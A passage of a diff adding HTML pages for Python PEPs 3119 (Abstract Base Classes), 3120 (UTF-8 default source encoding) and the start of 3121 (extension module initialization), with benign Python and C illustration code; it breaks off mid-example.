In particular, there is often a need to process objects in a way that +wasn’t anticipated by the creator of the object class. It is not +always the best solution to build in to every object methods that +satisfy the needs of every possible user of that object. Moreover, +there are many powerful dispatch philosophies that are in direct +contrast to the classic OOP requirement of behavior being strictly +encapsulated within an object, examples being rule or pattern-match +driven logic.

+

On the other hand, one of the criticisms of inspection by classic +OOP theorists is the lack of formalisms and the ad hoc nature of what +is being inspected. In a language such as Python, in which almost any +aspect of an object can be reflected and directly accessed by external +code, there are many different ways to test whether an object conforms +to a particular protocol or not. For example, if asking ‘is this +object a mutable sequence container?’, one can look for a base class +of ‘list’, or one can look for a method named ‘__getitem__’. But note +that although these tests may seem obvious, neither of them is +correct, as one generates false negatives, and the other false +positives.

+

The generally agreed-upon remedy is to standardize the tests, and +group them into a formal arrangement. This is most easily done by +associating with each class a set of standard testable properties, +either via the inheritance mechanism or some other means. Each test +carries with it a set of promises: it contains a promise about the +general behavior of the class, and a promise as to what other class +methods will be available.

+

This PEP proposes a particular strategy for organizing these tests +known as Abstract Base Classes, or ABC. ABCs are simply Python +classes that are added into an object’s inheritance tree to signal +certain features of that object to an external inspector. Tests are +done using isinstance(), and the presence of a particular ABC +means that the test has passed.

+

In addition, the ABCs define a minimal set of methods that establish +the characteristic behavior of the type. Code that discriminates +objects based on their ABC type can trust that those methods will +always be present. Each of these methods is accompanied by a +generalized abstract semantic definition that is described in the +documentation for the ABC. These standard semantic definitions are +not enforced, but are strongly recommended.

+

Like all other things in Python, these promises are in the nature of a +friendly agreement, which in this case means that while the +language does enforce some of the promises made in the ABC, it is up +to the implementer of the concrete class to ensure that the remaining +ones are kept.

+
+
+

Specification

+

The specification follows the categories listed in the abstract:

+
  • A way to overload isinstance() and issubclass().
  • A new module abc which serves as an “ABC support framework”. It +defines a metaclass for use with ABCs and a decorator that can be +used to define abstract methods.
  • Specific ABCs for containers and iterators, to be added to the +collections module.
+
+

Overloading isinstance() and issubclass()

+

During the development of this PEP and of its companion, PEP 3141, we +repeatedly faced the choice between standardizing more, fine-grained +ABCs or fewer, coarse-grained ones. For example, at one stage, PEP +3141 introduced the following stack of base classes used for complex +numbers: MonoidUnderPlus, AdditiveGroup, Ring, Field, Complex (each +derived from the previous). And the discussion mentioned several +other algebraic categorizations that were left out: Algebraic, +Transcendental, IntegralDomain, and PrincipalIdealDomain. In +earlier versions of the current PEP, we considered the use cases for +separate classes like Set, ComposableSet, MutableSet, HashableSet, +MutableComposableSet, HashableComposableSet.

+

The dilemma here is that we’d rather have fewer ABCs, but then what +should a user do who needs a less refined ABC? Consider e.g. the +plight of a mathematician who wants to define their own kind of +Transcendental numbers, but also wants float and int to be considered +Transcendental. PEP 3141 originally proposed to patch float.__bases__ +for that purpose, but there are some good reasons to keep the built-in +types immutable (for one, they are shared between all Python +interpreters running in the same address space, as is used by +mod_python [16]).

+

Another example would be someone who wants to define a generic +function (PEP 3124) for any sequence that has an append() method. +The Sequence ABC (see below) doesn’t promise the append() +method, while MutableSequence requires not only append() but +also various other mutating methods.

+

To solve these and similar dilemmas, the next section will propose a +metaclass for use with ABCs that will allow us to add an ABC as a +“virtual base class” (not the same concept as in C++) to any class, +including to another ABC. This allows the standard library to define +ABCs Sequence and MutableSequence and register these as +virtual base classes for built-in types like basestring, tuple +and list, so that for example the following conditions are all +true:

+
isinstance([], Sequence)
+issubclass(list, Sequence)
+issubclass(list, MutableSequence)
+isinstance((), Sequence)
+not issubclass(tuple, MutableSequence)
+isinstance("", Sequence)
+issubclass(bytearray, MutableSequence)
+
+
+

The primary mechanism proposed here is to allow overloading the +built-in functions isinstance() and issubclass(). The +overloading works as follows: The call isinstance(x, C) first +checks whether C.__instancecheck__ exists, and if so, calls +C.__instancecheck__(x) instead of its normal implementation. +Similarly, the call issubclass(D, C) first checks whether +C.__subclasscheck__ exists, and if so, calls +C.__subclasscheck__(D) instead of its normal implementation.

+

Note that the magic names are not __isinstance__ and +__issubclass__; this is because the reversal of the arguments +could cause confusion, especially for the issubclass() overloader.

+

A prototype implementation of this is given in [12].

+

Here is an example with (naively simple) implementations of +__instancecheck__ and __subclasscheck__:

+
class ABCMeta(type):
+
+    def __instancecheck__(cls, inst):
+        """Implement isinstance(inst, cls)."""
+        return any(cls.__subclasscheck__(c)
+                   for c in {type(inst), inst.__class__})
+
+    def __subclasscheck__(cls, sub):
+        """Implement issubclass(sub, cls)."""
+        candidates = cls.__dict__.get("__subclass__", set()) | {cls}
+        return any(c in candidates for c in sub.mro())
+
+class Sequence(metaclass=ABCMeta):
+    __subclass__ = {list, tuple}
+
+assert issubclass(list, Sequence)
+assert issubclass(tuple, Sequence)
+
+class AppendableSequence(Sequence):
+    __subclass__ = {list}
+
+assert issubclass(list, AppendableSequence)
+assert isinstance([], AppendableSequence)
+
+assert not issubclass(tuple, AppendableSequence)
+assert not isinstance((), AppendableSequence)
+
+
+

The next section proposes a full-fledged implementation.

+
+
+

The abc Module: an ABC Support Framework

+

The new standard library module abc, written in pure Python, +serves as an ABC support framework. It defines a metaclass +ABCMeta and decorators @abstractmethod and +@abstractproperty. A sample implementation is given by [13].

+

The ABCMeta class overrides __instancecheck__ and +__subclasscheck__ and defines a register method. The +register method takes one argument, which must be a class; after +the call B.register(C), the call issubclass(C, B) will return +True, by virtue of B.__subclasscheck__(C) returning True. +Also, isinstance(x, B) is equivalent to issubclass(x.__class__, +B) or issubclass(type(x), B). (It is possible type(x) and +x.__class__ are not the same object, e.g. when x is a proxy +object.)

+

These methods are intended to be called on classes whose metaclass +is (derived from) ABCMeta; for example:

+
from abc import ABCMeta
+
+class MyABC(metaclass=ABCMeta):
+    pass
+
+MyABC.register(tuple)
+
+assert issubclass(tuple, MyABC)
+assert isinstance((), MyABC)
+
+
+

The last two asserts are equivalent to the following two:

+
assert MyABC.__subclasscheck__(tuple)
+assert MyABC.__instancecheck__(())
+
+
+

Of course, you can also directly subclass MyABC:

+
class MyClass(MyABC):
+    pass
+
+assert issubclass(MyClass, MyABC)
+assert isinstance(MyClass(), MyABC)
+
+
+

Also, of course, a tuple is not a MyClass:

+
assert not issubclass(tuple, MyClass)
+assert not isinstance((), MyClass)
+
+
+

You can register another class as a subclass of MyClass:

+
MyClass.register(list)
+
+assert issubclass(list, MyClass)
+assert issubclass(list, MyABC)
+
+
+

You can also register another ABC:

+
class AnotherClass(metaclass=ABCMeta):
+    pass
+
+AnotherClass.register(basestring)
+
+MyClass.register(AnotherClass)
+
+assert isinstance(str, MyABC)
+
+
+

That last assert requires tracing the following superclass-subclass +relationships:

+
MyABC -> MyClass (using regular subclassing)
+MyClass -> AnotherClass (using registration)
+AnotherClass -> basestring (using registration)
+basestring -> str (using regular subclassing)
+
+
+

The abc module also defines a new decorator, @abstractmethod, +to be used to declare abstract methods. A class containing at least +one method declared with this decorator that hasn’t been overridden +yet cannot be instantiated. Such methods may be called from the +overriding method in the subclass (using super or direct +invocation). For example:

+
from abc import ABCMeta, abstractmethod
+
+class A(metaclass=ABCMeta):
+    @abstractmethod
+    def foo(self): pass
+
+A()  # raises TypeError
+
+class B(A):
+    pass
+
+B()  # raises TypeError
+
+class C(A):
+    def foo(self): print(42)
+
+C()  # works
+
+
+

Note: The @abstractmethod decorator should only be used +inside a class body, and only for classes whose metaclass is (derived +from) ABCMeta. Dynamically adding abstract methods to a class, or +attempting to modify the abstraction status of a method or class once +it is created, are not supported. The @abstractmethod only +affects subclasses derived using regular inheritance; “virtual +subclasses” registered with the register() method are not affected.

+

Implementation: The @abstractmethod decorator sets the +function attribute __isabstractmethod__ to the value True. +The ABCMeta.__new__ method computes the type attribute +__abstractmethods__ as the set of all method names that have an +__isabstractmethod__ attribute whose value is true. It does this +by combining the __abstractmethods__ attributes of the base +classes, adding the names of all methods in the new class dict that +have a true __isabstractmethod__ attribute, and removing the names +of all methods in the new class dict that don’t have a true +__isabstractmethod__ attribute. If the resulting +__abstractmethods__ set is non-empty, the class is considered +abstract, and attempts to instantiate it will raise TypeError. +(If this were implemented in CPython, an internal flag +Py_TPFLAGS_ABSTRACT could be used to speed up this check [6].)
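This flag-based mechanism can be observed directly (a sketch using the abc module as it ships today):
from abc import ABCMeta, abstractmethod
+
+class A(metaclass=ABCMeta):
+    @abstractmethod
+    def foo(self): pass
+
+# The decorator merely sets a flag; the metaclass collects the names.
+assert A.foo.__isabstractmethod__ is True
+assert A.__abstractmethods__ == frozenset({"foo"})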

+

Discussion: Unlike Java’s abstract methods or C++’s pure abstract +methods, abstract methods as defined here may have an implementation. +This implementation can be called via the super mechanism from the +class that overrides it. This could be useful as an end-point for a +super-call in a framework using cooperative multiple inheritance [7], +[8].

+

A second decorator, @abstractproperty, is defined in order to +define abstract data attributes. Its implementation is a subclass of +the built-in property class that adds an __isabstractmethod__ +attribute:

+
class abstractproperty(property):
+    __isabstractmethod__ = True
+
+
+

It can be used in two ways:

+
class C(metaclass=ABCMeta):
+
+    # A read-only property:
+
+    @abstractproperty
+    def readonly(self):
+        return self.__x
+
+    # A read-write property (cannot use decorator syntax):
+
+    def getx(self):
+        return self.__x
+    def setx(self, value):
+        self.__x = value
+    x = abstractproperty(getx, setx)
+
+
+

Similar to abstract methods, a subclass inheriting an abstract +property (declared using either the decorator syntax or the longer +form) cannot be instantiated unless it overrides that abstract +property with a concrete property.

+
+
+

ABCs for Containers and Iterators

+

The collections module will define ABCs necessary and sufficient +to work with sets, mappings, sequences, and some helper types such as +iterators and dictionary views. All ABCs have the above-mentioned +ABCMeta as their metaclass.

+

The ABCs provide implementations of their abstract methods that are +technically valid but fairly useless; e.g. __hash__ returns 0, and +__iter__ returns an empty iterator. In general, the abstract +methods represent the behavior of an empty container of the indicated +type.

+

Some ABCs also provide concrete (i.e. non-abstract) methods; for +example, the Iterator class has an __iter__ method returning +itself, fulfilling an important invariant of iterators (which in +Python 2 has to be implemented anew by each iterator class). These +ABCs can be considered “mix-in” classes.

+

No ABCs defined in the PEP override __init__, __new__, +__str__ or __repr__. Defining a standard constructor +signature would unnecessarily constrain custom container types, for +example Patricia trees or gdbm files. Defining a specific string +representation for a collection is similarly left up to individual +implementations.

+

Note: There are no ABCs for ordering operations (__lt__, +__le__, __ge__, __gt__). Defining these in a base class +(abstract or not) runs into problems with the accepted type for the +second operand. For example, if class Ordering defined +__lt__, one would assume that for any Ordering instances x +and y, x < y would be defined (even if it just defines a +partial ordering). But this cannot be the case: If both list and +str derived from Ordering, this would imply that [1, 2] < +(1, 2) should be defined (and presumably return False), while in +fact (in Python 3000!) such “mixed-mode comparisons” operations are +explicitly forbidden and raise TypeError. See PEP 3100 and [14] +for more information. (This is a special case of a more general issue +with operations that take another argument of the same type).

+
+

One Trick Ponies

+

These abstract classes represent single methods like __iter__ or +__len__.

+
+
Hashable
The base class for classes defining __hash__. The +__hash__ method should return an integer. The abstract +__hash__ method always returns 0, which is a valid (albeit +inefficient) implementation. Invariant: If classes C1 and +C2 both derive from Hashable, the condition o1 == o2 +must imply hash(o1) == hash(o2) for all instances o1 of +C1 and all instances o2 of C2. In other words, two +objects should never compare equal if they have different hash +values.

Another constraint is that hashable objects, once created, should +never change their value (as compared by ==) or their hash +value. If a class cannot guarantee this, it should not derive +from Hashable; if it cannot guarantee this for certain +instances, __hash__ for those instances should raise a +TypeError exception.

+

Note: being an instance of this class does not imply that an +object is immutable; e.g. a tuple containing a list as a member is +not immutable; its __hash__ method raises TypeError. +(This is because it recursively tries to compute the hash of each +member; if a member is unhashable it raises TypeError.)

+
+
Iterable
The base class for classes defining __iter__. The +__iter__ method should always return an instance of +Iterator (see below). The abstract __iter__ method +returns an empty iterator.
+
Iterator
The base class for classes defining __next__. This derives +from Iterable. The abstract __next__ method raises +StopIteration. The concrete __iter__ method returns +self. Note the distinction between Iterable and +Iterator: an Iterable can be iterated over, i.e. supports +the __iter__ methods; an Iterator is what the built-in +function iter() returns, i.e. supports the __next__ +method.
+
Sized
The base class for classes defining __len__. The __len__ +method should return an Integer (see “Numbers” below) >= 0. +The abstract __len__ method returns 0. Invariant: If a +class C derives from Sized as well as from Iterable, +the invariant sum(1 for x in c) == len(c) should hold for any +instance c of C. (See the sketch after this list.)
+
Container
The base class for classes defining __contains__. The +__contains__ method should return a bool. The abstract +__contains__ method returns False. Invariant: If a +class C derives from Container as well as from +Iterable, then (x in c for x in c) should be a generator +yielding only True values for any instance c of C.
+
+
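A brief sketch of these invariants, using a hand-rolled container and the collections.abc module where these ABCs eventually landed (the modern versions also perform structural checks, so no explicit registration is needed here):
from collections.abc import Container, Iterable, Sized
+
+class Bag:
+    def __init__(self, items): self._items = list(items)
+    def __len__(self): return len(self._items)
+    def __iter__(self): return iter(self._items)
+    def __contains__(self, x): return x in self._items
+
+b = Bag([1, 2, 2])
+assert sum(1 for _ in b) == len(b)     # the Sized/Iterable invariant
+assert all(x in b for x in b)          # the Container/Iterable invariant
+assert isinstance(b, Sized) and isinstance(b, Iterable)
+assert isinstance(b, Container)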

Open issues: Conceivably, instead of using the ABCMeta metaclass, +these classes could override __instancecheck__ and +__subclasscheck__ to check for the presence of the applicable +special method; for example:

+
class Sized(metaclass=ABCMeta):
+    @abstractmethod
+    def __len__(self):
+        return 0
+    @classmethod
+    def __instancecheck__(cls, x):
+        return hasattr(x, "__len__")
+    @classmethod
+    def __subclasscheck__(cls, C):
+        return hasattr(C, "__bases__") and hasattr(C, "__len__")
+
+
+

This has the advantage of not requiring explicit registration. +However, the semantics are hard to get exactly right given the confusing +semantics of instance attributes vs. class attributes, and that a +class is an instance of its metaclass; the check for __bases__ is +only an approximation of the desired semantics. Strawman: Let’s +do it, but let’s arrange it in such a way that the registration API +also works.

+
+
+

Sets

+

These abstract classes represent read-only sets and mutable sets. The +most fundamental set operation is the membership test, written as x +in s and implemented by s.__contains__(x). This operation is +already defined by the Container class defined above. Therefore, +we define a set as a sized, iterable container for which certain +invariants from mathematical set theory hold.

+

The built-in type set derives from MutableSet. The built-in +type frozenset derives from Set and Hashable.

+
+
Set
This is a sized, iterable container, i.e., a subclass of +Sized, Iterable and Container. Not every subclass of +those three classes is a set though! Sets have the additional +invariant that each element occurs only once (as can be determined +by iteration), and in addition sets define concrete operators that +implement the inequality operations as subset/superset tests. +In general, the invariants for finite sets in mathematics +hold. [11]

Sets with different implementations can be compared safely, +(usually) efficiently and correctly using the mathematical +definitions of the subset/superset operations for finite sets. +The ordering operations have concrete implementations; subclasses +may override these for speed but should maintain the semantics. +Because Set derives from Sized, __eq__ may take a +shortcut and return False immediately if two sets of unequal +length are compared. Similarly, __le__ may return False +immediately if the first set has more members than the second set. +Note that set inclusion implements only a partial ordering; +e.g. {1, 2} and {1, 3} are not ordered (all three of +<, == and > return False for these arguments; the sketch +after this list checks this with the built-in set type). +Sets cannot be ordered relative to mappings or sequences, but they +can be compared to those for equality (and then they always +compare unequal).

+

This class also defines concrete operators to compute union, +intersection, symmetric and asymmetric difference, respectively +__or__, __and__, __xor__ and __sub__. These +operators should return instances of Set. The default +implementations call the overridable class method +_from_iterable() with an iterable argument. This factory +method’s default implementation returns a frozenset instance; +it may be overridden to return another appropriate Set +subclass.

+

Finally, this class defines a concrete method _hash which +computes the hash value from the elements. Hashable subclasses of +Set can implement __hash__ by calling _hash or they +can reimplement the same algorithm more efficiently; but the +algorithm implemented should be the same. Currently the algorithm +is fully specified only by the source code [15].

+

Note: the issubset and issuperset methods found on the +set type in Python 2 are not supported, as these are mostly just +aliases for __le__ and __ge__.

+
+
MutableSet
This is a subclass of Set implementing additional operations +to add and remove elements. The supported methods have the +semantics known from the set type in Python 2 (except for +discard, which is modeled after Java):
+
.add(x)
Abstract method returning a bool that adds the element +x if it isn’t already in the set. It should return +True if x was added, False if it was already +there. The abstract implementation raises +NotImplementedError.
+
.discard(x)
Abstract method returning a bool that removes the element +x if present. It should return True if the element +was present and False if it wasn’t. The abstract +implementation raises NotImplementedError.
+
.pop()
Concrete method that removes and returns an arbitrary item. +If the set is empty, it raises KeyError. The default +implementation removes the first item returned by the set’s +iterator.
+
.toggle(x)
Concrete method returning a bool that adds x to the set if +it wasn’t there, but removes it if it was there. It should +return True if x was added, False if it was +removed.
+
.clear()
Concrete method that empties the set. The default +implementation repeatedly calls self.pop() until +KeyError is caught. (Note: this is likely much slower +than simply creating a new set, even if an implementation +overrides it with a faster approach; but in some cases object +identity is important.)
+
+

This also supports the in-place mutating operations |=, +&=, ^=, -=. These are concrete methods whose right +operand can be an arbitrary Iterable, except for &=, whose +right operand must be a Container. This ABC does not provide +the named methods present on the built-in concrete set type +that perform (almost) the same operations.

+
+
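The partial-ordering point above is easy to check with the built-in set type:
a, b = {1, 2}, {1, 3}
+
+# Neither is a subset of the other, so all three comparisons are
+# False: set inclusion is only a partial ordering.
+assert not (a < b) and not (a == b) and not (a > b)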
+
+
+

Mappings

+

These abstract classes represent read-only mappings and mutable +mappings. The Mapping class represents the most common read-only +mapping API.

+

The built-in type dict derives from MutableMapping.

+
+
Mapping
A subclass of Container, Iterable and Sized. The keys +of a mapping naturally form a set. The (key, value) pairs (which +must be tuples) are also referred to as items. The items also +form a set. Methods:
+
.__getitem__(key)
Abstract method that returns the value corresponding to +key, or raises KeyError. The implementation always +raises KeyError.
+
.get(key, default=None)
Concrete method returning self[key] if this does not raise +KeyError, and the default value if it does.
+
.__contains__(key)
Concrete method returning True if self[key] does not +raise KeyError, and False if it does.
+
.__len__()
Abstract method returning the number of distinct keys (i.e., +the length of the key set).
+
.__iter__()
Abstract method returning each key in the key set exactly once.
+
.keys()
Concrete method returning the key set as a Set. The +default concrete implementation returns a “view” on the key +set (meaning if the underlying mapping is modified, the view’s +value changes correspondingly); subclasses are not required to +return a view but they should return a Set.
+
.items()
Concrete method returning the items as a Set. The default +concrete implementation returns a “view” on the item set; +subclasses are not required to return a view but they should +return a Set.
+
.values()
Concrete method returning the values as a sized, iterable +container (not a set!). The default concrete implementation +returns a “view” on the values of the mapping; subclasses are +not required to return a view but they should return a sized, +iterable container.
+
+

The following invariants should hold for any mapping m:

+
len(m.values()) == len(m.keys()) == len(m.items()) == len(m)
+[value for value in m.values()] == [m[key] for key in m.keys()]
+[item for item in m.items()] == [(key, m[key]) for key in m.keys()]
+
+
+

i.e. iterating over the items, keys and values should return +results in the same order.

+
+
MutableMapping
A subclass of Mapping that also implements some standard +mutating methods. Abstract methods include __setitem__, +__delitem__. Concrete methods include pop, popitem, +clear, update. Note: setdefault is not included. +Open issues: Write out the specs for the methods.
+
+
+
+

Sequences

+

These abstract classes represent read-only sequences and mutable +sequences.

+

The built-in list and bytes types derive from +MutableSequence. The built-in tuple and str types derive +from Sequence and Hashable.

+
+
Sequence
A subclass of Iterable, Sized, Container. It +defines a new abstract method __getitem__ that has a somewhat +complicated signature: when called with an integer, it returns an +element of the sequence or raises IndexError; when called with +a slice object, it returns another Sequence. The concrete +__iter__ method iterates over the elements using +__getitem__ with integer arguments 0, 1, and so on, until +IndexError is raised. The length should be equal to the +number of values returned by the iterator. (A sketch after this +list illustrates this iteration pattern.)

Open issues: Other candidate methods, which can all have +default concrete implementations that only depend on __len__ +and __getitem__ with an integer argument: __reversed__, +index, count, __add__, __mul__.

+
+
MutableSequence
A subclass of Sequence adding some standard mutating methods. +Abstract mutating methods: __setitem__ (for integer indices as +well as slices), __delitem__ (ditto), insert. Concrete +mutating methods: append, reverse, extend, pop, +remove. Concrete mutating operators: +=, *= (these +mutate the object in place). Note: this does not define +sort() – that is only required to exist on genuine list +instances.
+
+
+
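The interpreter's old sequence-iteration fallback follows the same 0, 1, 2, …/IndexError pattern described for Sequence above, which makes it easy to sketch:
class Squares:
+    # Only __getitem__ is defined; iteration proceeds through
+    # indices 0, 1, 2, ... until IndexError is raised.
+    def __getitem__(self, i):
+        if i >= 5:
+            raise IndexError(i)
+        return i * i
+
+assert list(Squares()) == [0, 1, 4, 9, 16]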
+
+

Strings

+

Python 3000 will likely have at least two built-in string types: byte +strings (bytes), deriving from MutableSequence, and (Unicode) +character strings (str), deriving from Sequence and +Hashable.

+

Open issues: define the base interfaces for these so alternative +implementations and subclasses know what they are in for. This may be +the subject of a new PEP or PEPs (PEP 358 should be co-opted for the +bytes type).

+
+
+
+

ABCs vs. Alternatives

+

In this section I will attempt to compare and contrast ABCs to other +approaches that have been proposed.

+
+

ABCs vs. Duck Typing

+

Does the introduction of ABCs mean the end of Duck Typing? I don’t +think so. Python will not require that a class derives from +BasicMapping or Sequence when it defines a __getitem__ +method, nor will the x[y] syntax require that x is an instance +of either ABC. You will still be able to assign any “file-like” +object to sys.stdout, as long as it has a write method.

+

Of course, there will be some carrots to encourage users to derive +from the appropriate base classes; these vary from default +implementations for certain functionality to an improved ability to +distinguish between mappings and sequences. But there are no sticks. +If hasattr(x, "__len__") works for you, great! ABCs are intended to +solve problems that don’t have a good solution at all in Python 2, +such as distinguishing between mappings and sequences.

+
+
+

ABCs vs. Generic Functions

+

ABCs are compatible with Generic Functions (GFs). For example, my own +Generic Functions implementation [4] uses the classes (types) of the +arguments as the dispatch key, allowing derived classes to override +base classes. Since (from Python’s perspective) ABCs are quite +ordinary classes, using an ABC in the default implementation for a GF +can be quite appropriate. For example, if I have an overloaded +prettyprint function, it would make total sense to define +pretty-printing of sets like this:

+
@prettyprint.register(Set)
+def pp_set(s):
+    return "{" + ... + "}"  # Details left as an exercise
+
+
+

and implementations for specific subclasses of Set could be added +easily.

+

I believe ABCs also won’t present any problems for RuleDispatch, +Phillip Eby’s GF implementation in PEAK [5].

+

Of course, GF proponents might claim that GFs (and concrete, or +implementation, classes) are all you need. But even they will not +deny the usefulness of inheritance; and one can easily consider the +ABCs proposed in this PEP as optional implementation base classes; +there is no requirement that all user-defined mappings derive from +BasicMapping.

+
+
+

ABCs vs. Interfaces

+

ABCs are not intrinsically incompatible with Interfaces, but there is +considerable overlap. For now, I’ll leave it to proponents of +Interfaces to explain why Interfaces are better. I expect that much +of the work that went into e.g. defining the various shades of +“mapping-ness” and the nomenclature could easily be adapted for a +proposal to use Interfaces instead of ABCs.

+

“Interfaces” in this context refers to a set of proposals for +additional metadata elements attached to a class which are not part of +the regular class hierarchy, but do allow for certain types of +inheritance testing.

+

Such metadata would be designed, at least in some proposals, so as to +be easily mutable by an application, allowing application writers to +override the normal classification of an object.

+

The drawback to this idea of attaching mutable metadata to a class is +that classes are shared state, and mutating them may lead to conflicts +of intent. Additionally, the need to override the classification of +an object can be done more cleanly using generic functions: In the +simplest case, one can define a “category membership” generic function +that simply returns False in the base implementation, and then provide +overrides that return True for any classes of interest.

+
+
+
+

References

+ +

[2] Incomplete implementation prototype, by GvR + (https://web.archive.org/web/20170223133820/http://svn.python.org/view/sandbox/trunk/abc/)

+

[3] Possible Python 3K Class Tree?, wiki page created by Bill Janssen + (https://wiki.python.org/moin/AbstractBaseClasses)

+ +

[9] Partial order, in Wikipedia + (https://en.wikipedia.org/wiki/Partial_order)

+

[10] Total order, in Wikipedia + (https://en.wikipedia.org/wiki/Total_order)

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3119.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3120/index.html b/pep-3120/index.html new file mode 100644 index 00000000000..309141dff53 --- /dev/null +++ b/pep-3120/index.html @@ -0,0 +1,197 @@ + + + + + + + + PEP 3120 – Using UTF-8 as the default source encoding | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3120 – Using UTF-8 as the default source encoding

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Specification

+

This PEP proposes to change the default source encoding from ASCII to +UTF-8. Support for alternative source encodings (PEP 263) continues to +exist; an explicit encoding declaration takes precedence over the +default.
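A minimal illustration (the declaration syntax is the PEP 263 coding cookie; the file contents are hypothetical):
# -*- coding: latin-1 -*-
+# With the declaration above, this file is decoded as Latin-1.
+# Remove it and, under this PEP, the bytes are decoded as UTF-8
+# instead of being rejected as non-ASCII.
+s = "café"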

+
+
+

A Bit of History

+

In Python 1, the source encoding was unspecified, except that the +source encoding had to be a superset of the system’s basic execution +character set (i.e. an ASCII superset, on most systems). The source +encoding was only relevant for the lexis itself (bytes representing +letters for keywords, identifiers, punctuation, line breaks, etc). +The contents of a string literal were copied literally from the +source file.

+

In Python 2.0, the source encoding changed to Latin-1 as a side effect +of introducing Unicode. For Unicode string literals, the characters +were still copied literally from the source file, but widened on a +character-by-character basis. As Unicode gives a fixed interpretation +to code points, this algorithm effectively fixed a source encoding, at +least for files containing non-ASCII characters in Unicode literals.

+

PEP 263 identified the problem that you can use only those Unicode +characters in a Unicode literal which are also in Latin-1, and +introduced a syntax for declaring the source encoding. If no source +encoding was given, the default should be ASCII. For compatibility +with Python 2.0 and 2.1, files were interpreted as Latin-1 for a +transitional period. This transition ended with Python 2.5, which +gives an error if non-ASCII characters are encountered and no source +encoding is declared.

+
+
+

Rationale

+

With PEP 263, using arbitrary non-ASCII characters in a Python file is +possible, but tedious. One has to explicitly add an encoding +declaration. Even though some editors (like IDLE and Emacs) support +the declarations of PEP 263, many editors still do not (and never +will); users have to explicitly adjust the encoding which the editor +assumes on a file-by-file basis.

+

When the default encoding is changed to UTF-8, adding non-ASCII text +to Python files becomes easier and more portable: On some systems, +editors will automatically choose UTF-8 when saving text (e.g. on Unix +systems where the locale uses UTF-8). On other systems, editors will +guess the encoding when reading the file, and UTF-8 is easy to +guess. Yet other editors support associating a default encoding with a +file extension, allowing users to associate .py with UTF-8.

+

For Python 2, an important reason for using non-UTF-8 encodings was +that byte string literals would be in the source encoding at run-time, +allowing one to output them to a file or render them to the user +as-is. With Python 3, all strings will be Unicode strings, so the +original encoding of the source will have no impact at run-time.

+
+
+

Implementation

+

The parser needs to be changed to accept bytes > 127 if no source +encoding is specified; instead of giving an error, it needs to check +that the bytes are well-formed UTF-8 (decoding is not necessary, +as the parser converts all source code to UTF-8, anyway).

+

IDLE needs to be changed to use UTF-8 as the default encoding.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3120.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3121/index.html b/pep-3121/index.html new file mode 100644 index 00000000000..9a5c262ca8f --- /dev/null +++ b/pep-3121/index.html @@ -0,0 +1,342 @@ + + + + + + + + PEP 3121 – Extension Module Initialization and Finalization | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3121 – Extension Module Initialization and Finalization

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at PyInit_modulename() and +PyModuleDef.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Extension module initialization currently has a few deficiencies. +There is no cleanup for modules, the entry point name might give +naming conflicts, the entry functions don’t follow the usual calling +convention, and multiple interpreters are not supported well. This PEP +addresses these issues.

+
+
+

Problems

+
+

Module Finalization

+

Currently, extension modules are usually initialized once and then “live” forever. The only exception is when Py_Finalize() is called: then the initialization routine is invoked a second time. This is bad from a resource management point of view: memory and other resources might get allocated each time initialization is called, but there is no way to reclaim them. As a result, there is currently no way to completely release all resources Python has allocated.

+
+
+

Entry point name conflicts

+

The entry point is currently called init<module>. This might conflict +with other symbols also called init<something>. In particular, +initsocket is known to have conflicted in the past (this specific +problem got resolved as a side effect of renaming the module to +_socket).

+
+
+

Entry point signature

+

The entry point is currently a procedure (returning void). This +deviates from the usual calling conventions; callers can find out +whether there was an error during initialization only by checking +PyErr_Occurred. The entry point should return a PyObject*, which will +be the module created, or NULL in case of an exception.

+
+
+

Multiple Interpreters

+

Currently, extension modules share their state across all +interpreters. This allows for undesirable information leakage across +interpreters: one script could permanently corrupt objects in an +extension module, possibly breaking all scripts in other interpreters.

+
+
+
+

Specification

+

The module initialization routines change their signature +to:

+
PyObject *PyInit_<modulename>()
+
+
+

The initialization routine will be invoked once per +interpreter, when the module is imported. It should +return a new module object each time.

+

In order to store per-module state in C variables, +each module object will contain a block of memory +that is interpreted only by the module. The amount +of memory used for the module is specified at +the point of creation of the module.

+

In addition to the initialization function, a module +may implement a number of additional callback +functions, which are invoked when the module’s +tp_traverse, tp_clear, and tp_free functions are +invoked, and when the module is reloaded.

+

The entire module definition is combined in a struct +PyModuleDef:

+
struct PyModuleDef{
+  PyModuleDef_Base m_base;  /* To be filled out by the interpreter */
+  Py_ssize_t m_size; /* Size of per-module data */
+  PyMethodDef *m_methods;
+  inquiry m_reload;
+  traverseproc m_traverse;
+  inquiry m_clear;
+  freefunc m_free;
+};
+
+
+

Creation of a module is changed to expect an optional +PyModuleDef*. The module state will be +null-initialized.

+

Each module method will be passed the module object +as the first parameter. To access the module data, +a function:

+
void* PyModule_GetState(PyObject*);
+
+
+

will be provided. In addition, to look up a module more efficiently than going through sys.modules, a function:

+
PyObject* PyState_FindModule(struct PyModuleDef*);
+
+
+

will be provided. This lookup function will use an +index located in the m_base field, to find the +module by index, not by name.

+

As all Python objects should be controlled through Python’s memory management, usage of “static” type objects is discouraged, unless the type object itself has no memory-managed state. To simplify the definition of heap types, a new method:

+
PyTypeObject* PyType_Copy(PyTypeObject*);
+
+
+

is added.

+
+
+

Example

+

xxmodule.c would be changed to remove the initxx +function, and add the following code instead:

+
struct xxstate{
+  PyObject *ErrorObject;
+  PyObject *Xxo_Type;
+};
+
+#define xxstate(o) ((struct xxstate*)PyModule_GetState(o))
+
+static int xx_traverse(PyObject *m, visitproc v,
